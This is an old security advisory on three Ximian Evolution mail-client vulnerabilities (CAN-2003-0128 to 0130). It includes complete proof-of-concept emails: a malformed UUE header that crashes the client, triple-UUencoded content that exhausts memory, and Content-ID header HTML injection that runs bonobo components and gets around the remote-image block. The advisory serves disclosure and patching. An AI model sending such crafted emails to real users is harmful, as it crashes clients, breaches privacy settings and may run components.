20th Mar 2003 [SBWID-6077]
COMMAND
	Ximian 's Evolution Multiple vulnerabilities
SYSTEMS AFFECTED
	Evolution 1.2.2 and prior releases are vulnerable, partially  or  wholly
	to the vulnerabilities in this advisory.
PROBLEM
	In Core Security Technologies Advisory [CORE-20030304-01] :
	
	 http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
	
	 *Credits:*
	 ==========
	These vulnerabilities were found by Diego  Kelyacoubian,  Javier  Kohen,
	Alberto Solino, and Juan Vera from  Core  Security  Technologies  during
	Bugweek 2003 (March 3-7, 2003).
	We would like to thank  Carlos  Montero  Luque  at  Ximian  for  quickly
	addressing  our  report  and  coordinating  the  generation  and  public
	release of patches and information regarding these vulnerabilities.
	Thanks also to Jeffrey Stedfast  and  other  members  of  the  Evolution
	development team for the followup and  development  of  the  patches  to
	close these vulnerabilities.
	 *Vulnerability Description:*
	 ============================
	Ximian Evolution is a  personal  and  workgroup  information  management
	solution for Linux  and  UNIX-based  systems.  The  software  integrates
	email, calendaring, meeting scheduling,  contact  management,  and  task
	lists, in one application. For more information about  Ximian  Evolution
	visit http://www.ximian.com
	Three vulnerabilities were found that could lead  to  various  forms  of
	exploitation ranging from denying to users the ability  to  read  email,
	provoke system unstability, bypassing security context checks for  email
	content and possibly  execution  of  arbitrary  commands  on  vulnerable
	systems.
	The following security vulnerabilities were found:
	 [CAN-2003-0128, BID 7117]
	The Evolution mailer accepts UUEncoded content  and  will  transparently
	decode it. By including a specially crafted UUE header  as  part  of  an
	otherwise perfectly normal email an attacker has the  ability  to  crash
	Evolution as soon as the mail is  parsed.  This  makes  it  particularly
	difficult to delete this email from Evolution's GUI and prevents a  user
	from reading  email  until  the  malicious  mail  is  removed  from  the
	mailbox.
	All versions of Evolution that include the  function  try_uudecoding  in
	the module mail/mail-format.c are vulnerable.
	 [CAN-2003-0129, BID 7118]
	Having the Evolution mailer  process  mail  content  UUencoded  multiple
	times will cause resource starvation.  The  MUA  will  try  to  allocate
	memory until it  dies,  possibly  leading  to  system  unstability.  Our
	example in the technical details section uses email  content  encoded  3
	times.
	 [CAN-2003-0130, BID 7119]
	By including a specially crafted MIME Content-ID header as  part  of  an
	image/* MIME part, it is possible to include arbitrary  data,  including
	HTML tags, into the stream that is passed to GTKHtml for rendering.
	These vulknerabilities provides multiple exploitation  possibilities  in
	the Evolution mailer. Namely, it's possible:
	 a) To crash the application. The crash appears to be the result
	   of heap corruption, further research on this bug is required
	   to demostrate sucessfull exploitation to run arbitrary commands
	   on vulnerable systems.
	 b) To bypass the "Don't connect to remote hosts to fetch images"
	   option.
	 c) To execute some bonobo components and pass them arbitrary content,
	   included as part of the mail.
	 *Technical Description - Exploit/Concept Code:*
	 ===============================================
	 [CAN-2003-0128, BID 7117]
	
	 The following email will reproduce this vulnerability, note that
	 an empty line is required before and after the UUE header line.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: inline; filename=name
	Content-Type: application/octet-stream; name=name
	Content-Transfer-Encoding: 7bit
	begin 600
	end
	--=-mTDu5zdJIsixETTwCF5Y--
	
	 [CAN-2003-0129, BID 7118]
	
	 The following email will reproduce this vulnerability.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	--=3D-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: inline; filename=3Dname
	Content-Type: application/octet-stream; name=3Dname
	Content-Transfer-Encoding: 7bit
	begin 600 phase2
	M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
	M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
	M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\
	M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
	M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
	M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
	?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@  
	end
	--=3D-mTDu5zdJIsixETTwCF5Y--
	
	 [CAN-2003-0130, BID 7119]
	
	 The handle_image() function, located in the module
	 mail/mail-format.c, lacks proper input checking. This function does
	 not escape HTML characters in the string returned by get_cid, which
	 is in turn constructed from the Content-ID MIME header included in
	 the MIME part.
	 It can be exploited several ways, for instance:
	 a) The Evolution mailer will crash when a MIME part's Content-ID is
	    referenced from two different object tags via the cid "protocol".
	    The following email will reproduce this vulnerability in Evolution
	    version 1.2.1:
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Type: text/plain
	Content-Transfer-Encoding: 7bit
	Content-Id: hello
	Hello World!
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name1.gif
	Content-Type: image/gif;  name=name1.gif
	Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name2.gif
	Content-Type: image/gif;  name=name2.gif
	Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	--=-mTDu5zdJIsixETTwCF5Y
	 b) The following email bypasses the "Don't connect to remote hosts
	    to fetch images" option.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Type: text/html
	Content-Transfer-Encoding: 7bit
	Content-Id: apart
	<img src="http://external.host.com:anyport">
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name2.gif
	Content-Type: image/gif;  name=name2.gif
	Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	--=-mTDu5zdJIsixETTwCF5Y
	 c) It is possible to execute bonobo components to handle content
	    types that Evolution mailer does not handle internally (for example
	    audio/ulaw). The following mail uses the Content-ID bug to execute
	    the bonobo-audio-ulaw component (bundled by default with bonobo)
	    and pass it arbitrary content.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Type: audio/ulaw
	Content-Transfer-Encoding: 7bit
	Content-Id: mysong
	There she was, just walking down the street...
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name2.gif
	Content-Type: image/gif;  name=name2.gif
	Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	--=-mTDu5zdJIsixETTwCF5Y
	
SOLUTION
	Ximian is  providing  Evolution  1.2.3  on  [March  18/March  19].  This
	release resolves all vulnerabilities in this advisory as well  as  other
	unrelated bugs. The patched  code  for  Evolution  that  resolves  these
	vulnerabilities is also already available in GNOME CVS.
	A workaround for unpatched versions of Evolution  to  prevent  Evolution
	from crashing when viewing messages that exploit  these  vulnerabilities
	is to go into "View"->"Message Display" and change the  value  to  "Show
	E-mail Source."
	Distribution vendors who provide their own  version  of  Evolution  have
	been advised of these  issues  as  well  as  having  been  provided  the
	patches to fix  them.  They  may  provide  updated  packages  for  their
	distributions.